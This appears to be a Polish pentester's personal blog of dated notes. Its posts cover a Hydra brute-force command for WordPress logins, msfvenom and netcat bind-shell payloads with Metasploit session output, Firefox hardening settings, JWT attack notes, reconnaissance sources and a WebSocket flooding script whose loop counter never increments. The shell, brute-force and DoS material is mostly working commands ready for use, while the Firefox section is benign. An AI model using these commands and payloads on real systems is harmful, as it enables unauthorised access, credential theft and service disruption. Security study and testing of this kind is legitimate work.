czwartek, 10 stycznia 2019

Hydra cheat sheet

Wordpress:

hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'

środa, 12 grudnia 2018

bind shell



msvenom bind shell:

vitim:
msfvenom -p linux/x64/shell_bind_tcp  LPORT=2222  -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100


ls
dirtyc0w




netcat:
nc -lvp 8080 -e /bin/bash <- victim
nc IP_VICTIM 8080 <-- attacker


Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf
chmod +x shell_meterpreter_bind_2223.elf
./shell_meterpreter_bind_2223.elf

attacker:
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2223             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223
[*] Sending stage (861480 bytes) to 172.21.65.139
[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >

środa, 7 listopada 2018

Hardening firefox

[about:config]
privacy.firstparty.isolate = true
privacy.resistFingerprint = true
privacy.trackingprotection.enabled = true
privacy.donottrackheader.enabled = true
privacy.donottrackheader.value = 1
browser.cache.disk.enable = false
browser.cache.disk.filesystem_reported = 1
browser.cache.disk.smart_size.first_run = false
browser.cache.disk.cache_ssl = false
browser.cache.disk.frecency_experiment = 2
browser.cache.offline.enable = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.send_pings = false
browser.sessionstore.max_tabs_undo = 0
browser.urlbar.speculativeConnect.enabled = false
browser.sessionstore.privacy_level = 2
browser.privatebrowsing.autostart = true
browser.safebrowsing.appRepURL = (empty)
dom.battery.enabled = false
dom.event.clipboardevents.enabled = true
dom.indexedDB.enabled = false
dom.storage.enabled = false
geo.enabled = false
geo.wifi.uri = (empty)
media.navigator.enabled = false
network.cookie.cookieBehavior = 1
network.cookie.lifetimePolicy = 2
network.http.referer.trimmingPolicy = 2
network.http.referer.XOriginPolicy = 2
network.http.referer.XOriginTrimmingPolicy = 2
network.prefetch-next = false
network.http.referer.spoofSource = true
network.dns.disablePrefetch = true
network.IDN_show_punycode = true
webgl.disabled = true
beacon.enabled = false
media.video_stats.enabled = false
media.peerconnection.enabled = false
media.peerconnection.dtmf.enabled = false
media.peerconnection.ice.default_address_only = true
media.peerconnection.ice.no_host = true
media.peerconnection.identity.enabled = false
media.peerconnection.simulcast = false
media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.video.vp9_enabled = false
security.ssl3.rsa_aes_128_sha = false
security.ssl3.rsa_aes_256_sha = false
security.ssl3.rsa_des_ede3_sha = false
general.useragent.site_specific_overrides = true


Plugins:

https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/ 



Check your browser's properties with:

https://check.torproject.org/
https://ip-check.info/?lang=en
https://ipleak.net/

czwartek, 18 października 2018

JWT - JSON Web Tokens


Notatki z SHP

JTW - bezpieczna wymiana informacji wykorzystująca json pomiędzy dwoma apkami 

Rozkowanie base64 (wiec nie zapewnia poufności) 

Httparchive 

GoogleBigquery i wyszukiwanie danych z httparchive (np. Tokenow jwt, authorization basic itp)

  1. Bruteforce hasla do JWT (np. Hashcatem)
  2. Zmiana algorytmu szyfrującego (np. Z HS256) JWT na none 
  • Uwaga na JWT.io jak wpiszemy alg none to nie pokaże wyników (trzeba samemu base64 codowac
 3. Resign-vuln - szyfruje kluczem prywatnym RSA mój token, a publiczny klucz RSA wrzucam w headerze

JWT WYGLADA TAK:  NAGLOWEK.DANE.PODPIS



sekurak.pl/jwt-ebook.pdf < opis JWT wraz z checlista ]

Rekonesans IT


Notatki z SHP

gotcha.pw - wyciek hasel (pobranie bazy bez gwiazdek? Tak)
https://www.zoomeye.org/ /shodan : (zoomeye: +django +debug.) (W shodan has_screenshot:yes) 
crt.sh  - %domena.pl (szuka subdomen)
builtwith.com/ -pokazuje z jakich technologi zbudowana jest infra,
zakładka relationship profile pokazuje kody trackujace i pokazać inne site które z niego korzystają :) 
hardenize.com - skaner bezpieczenstwa 
android.fallible.co - szuka sekretnych danych w apce mobilnej 
publicwww.com - wyszukiwarka kodow zrodlowych html,css,javascriptow - szukamy tutaj np. Malwarow itp, poszukac klucze api (wpisujac w wyszukiwarke apikey)

github.com/michenriksen/aquatone - szuka subdomen  (szuka we wszystkim virustotal(trzeba dac api key, crt.sh webarchive, itp)

Virustotal.com - search: twitter.com (do szukania subdomen) / szukanie tez wirtualnych domen klikając na IP w wynikach wyszukiwania 
archive.org - szukanie starych linków do aktualnych zasobow, jak juz jest nowa www a stary zasob moze zostal, szukanie tez podd omen

Blind XSS


Notatki z SHP


Excessy - narzędzie do XSS , używające websockets od Michała Bentkowskiego

XSS PROXY - https://github.com/securityMB/excessy 


iframe=sanbox jako ochrona przed xss

  1. request get aby pobrać token csrf
  2. Potem post aby go użyć

środa, 25 kwietnia 2018

WebSocket DoS tester

Pyhton client - websocket denial of service tester


import websocket
import ssl
from websocket import create_connection



counter = 0
while counter <= 100:
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})

        ws.connect("wss://echo.websocket.org")
        print("Sending 'Hello, World'...")
        ws.send("Hello, World")
        print("Sent")
        print("'%s'" % counter)
        print("Receiving...")
        result =  ws.recv()
        print("Received '%s'" % result)
        counter +1